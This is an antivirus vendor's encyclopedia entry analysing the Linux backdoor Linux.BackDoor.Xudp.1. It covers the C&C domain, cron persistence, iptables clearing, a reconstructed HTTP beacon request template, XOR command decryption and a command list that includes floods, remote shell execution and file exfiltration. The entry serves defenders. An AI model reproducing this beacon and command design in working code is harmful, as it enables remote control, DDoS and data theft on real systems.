Library
My library

+ Add to library

Profile

Linux.BackDoor.Xudp.1

Added to the Dr.Web virus database: 2016-03-15

Virus description added:

SHA1

  • 3a5f73d9beb74ee017965fa8922b2228fb684816

A backdoor for Linux that is installed by other downloader Trojans. The main module is located in the /lib/ folder. Its autorun function is enabled in the cron scheduler. At the Trojan’s installation, the contents of the iptables utility is cleared.

Once launched, Linux.BackDoor.Xudp.1 decrypts configuration data hard-coded in the Trojan’s body that looks as follows:

dr0id1.xyz          ; the C&C server
transfer.php        ; Page to which requests are sent
XorUDP              ; Name of the backdoor that is used as User-Agent when 
			generating requests
300                 ; Http sleep time
5                   ; Keepalive sleep time
/bin/socket         ;NewProcName
1                   ;usemutex
700                 ;low range udp port
800                 ;high rande udp port

Encrypted lines are stored and sent as follows:

<lenght>:<encrypted value>
10:09Ц<о*.Йs

If the NewProcName parameter has a non-zero value, the Trojan’s process is hidden under the name specified in the configuration.

If the usemutex parameter also is not set to zero, the “/var/.mutexlock” file is blocked. If the Trojan fails to block this file, it stops operating.

Then the Trojan generates a 128-byte key, selects a value of the UDP port, and runs three threads: HTTP_Thread, UDP_Listen, and UDP_KeepAlive.

HTTP_Thread

When this thread is launched, the Trojan sends a generated key, a port’s address, and the backdoor’s version to the server. Then it periodically requests the following page from the server:

template1 = "k=%s&p=%s&v=%s&s=1"
param1 = encodenum(ourKey)
param2 = encodenum(udpPort)
param3 = encodenum(version)
params = template1 % (param1,param2, param3)
request = "POST /%s HTTP/1.0\r\nHost: %s\r\nUser-Agent: %s\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: %d\r\n\r\n%s"
actualRequest = request % (page, host, name, len(params), params)

The server replies with one of 4 messages:

First 2 bytesFunction
00Install client_key + client_port + client_ip
01Execute a command
02Reset client_key, client_port, client_ip
03Terminate execution

All instructions are first decrypted with a key generated by the backdoor. Then the obtained buffer is decrypted using client_key:

XOR(msg, len, ourKey);
XOR(msg, len, &client_key);

UDP_Listen

If a datagram was not received from client_ip, it is ignored. If the client_key value is not set, nothing happens. An incoming UDP message is decrypted and looks as follows:

<handler>:<transaction_id> <command>
FieldFunction
msg_idMessage ID. All incoming msg_id are saved, and a command is executed only if an unknown msg_id is received.
HandlerA 8-bytes command identifier
commandRandom line

The backdoor can execute the following commands:

  • Runs flood (i.e. sending repeated requests to a remote server)
  • Terminates flood
  • Executes an incoming command with the system() function
  • Launches a received line using the popen function and returns the command’s output
  • Opens a listening UDP socket that logs all requests to this port in a specified file in the <ipaddr> <size> <List Port> format
  • Sends the specified file by parts of a certain size in specified time interval
  • Scans a specified range of IP addresses
  • Sends a list of msg_id, that are less than those of the current message, which were not processed
  • Marks sent msg_id as processed
  • Terminates execution

UDP_KeepAlive:

The malware sends a specific datagram to the server in order to inform that it is still active.

News about the Trojan

Curing recommendations


Linux

After booting up, run a full scan of all disk partitions with Dr.Web Anti-virus for Linux.

Free trial

One month (no registration) or three months (registration and renewal discount)

Download Dr.Web

Download by serial number